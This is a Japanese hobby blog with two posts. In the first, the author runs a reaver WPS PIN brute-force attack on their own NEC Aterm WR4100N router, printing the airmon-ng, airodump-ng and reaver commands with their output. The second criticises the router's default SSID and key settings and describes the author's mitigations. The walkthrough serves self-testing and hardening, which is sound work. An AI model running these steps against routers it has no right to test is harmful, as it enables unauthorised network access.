FC2ブログ
PC関係の日記
スポンサーサイト
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。
reaverを試してみた。
自宅のNEC Aterm WR4100Nに対して、reaverを試してみた。

WR4100Nのファームウェアバージョンは、1.0.10です。

# which reaver
/usr/local/bin/reaver
コマンド入ってる。


# iwconfig
lo no wireless extensions.

wlan0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on

eth0 no wireless extensions.
モニターモードのデバイスなし。


# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
732 dhclient3
1720 dhclient3
Process with PID 1720 (dhclient3) is running on interface wlan0


Interface Chipset Driver

wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0)
モニターモードにする。


# iwconfig
lo no wireless extensions.

mon0 IEEE 802.11abgn Mode:Monitor Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on

wlan0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on

eth0 no wireless extensions.
モニターモードになった。


# airodump-ng mon0
ログは省略…
BSSIDを得る。


# reaver -i mon0 -b BSSID
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Waiting for beacon from xxx
[+] Associated with xxx (ESSID: xxx)
[+] 0.04% complete @ 2013-01-16 22:33:51 (10 seconds/pin)
[+] 0.07% complete @ 2013-01-16 22:34:16 (8 seconds/pin)
~中略~
[+] 1.42% complete @ 2013-01-16 23:01:03 (10 seconds/pin)
^C
[+] Session saved.
遅いっす。止めます。
おや、なんか保存してる。



# reaver -i mon0 -b xxx
eaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[?] Restore previous session for xxx? [n/Y] y
[+] Restored previous session
[+] Waiting for beacon from xxx
[+] Associated with xxx (ESSID: xxx)
[+] 1.47% complete @ 2013-01-16 23:02:02 (4 seconds/pin)
おっ、再開した。
でも止めます。


結果、遅いから止めました。
多分、できるでしょう…


スポンサーサイト
無線LAN親機のメーカー初期設定…
たんなる、つぶやきです。

自分の無線LANアクセスポイントのセキュリティを見ています。

セキュリティホールがあるのは確実ですけど…
NEC WR4100Nで、PIN番号を使った攻撃で、クラックできます。
対策ファームも出てますが、自分で攻撃するためにアップして
いません。
興味のある方は、こちらもどうぞ。

そして、前から思ってましたけど、メーカーの初期設定って変ですね。

NEC ATERMのマルチSSID
まず名前、用意に推測できます。
ステルスを使うと接続できない端末があるので、
WARPSTAR-xxxx-Wを見せると、WAP側を隠しても推測できます。
その逆も...

WARPSTAR-xxxx   WAP/WAP2
WARPSTAR-xxxx-W  WEP


次は、暗号化キー
WAPとWEPで、同じ物が初期値ですね。
WEPがクラックされたら終わりですね。


どちらも変えれば済みますけど、メーカーの初期設定って
何を基準に考えているのか…
多分、簡単でわかりやすい物にしたんでしょうけどね。
多くの人は、初期値を変えないから、逆に安心・安全な物に
してくれた方が、自分的には良いのですが。


WR4100Nは、マルチSSIDをOFFにできないので、両方WAPに
して、片側のみ使っています。

また、PIN番号については、PIN方式を"使用する"の設定が
あったので、チェックを外しています。

SSIDの名前も変えました。使っている機器を特定されないように
するために。このままだとNEC ATERMシリーズとわかりますから。
MACアドレスの情報から、ある程度わかっちゃいますけどね…


たまには、購入した機器ののメーカーページも見たほうが
良いですね。結構、ACアダプタの不具合等もありますから…


上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。